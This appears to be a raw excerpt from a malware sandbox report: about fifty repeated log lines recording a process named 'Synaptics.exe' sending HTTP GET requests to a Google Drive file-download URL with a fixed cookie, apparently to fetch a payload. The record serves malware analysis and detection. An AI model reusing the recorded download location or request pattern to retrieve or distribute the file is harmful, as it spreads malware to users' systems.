                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
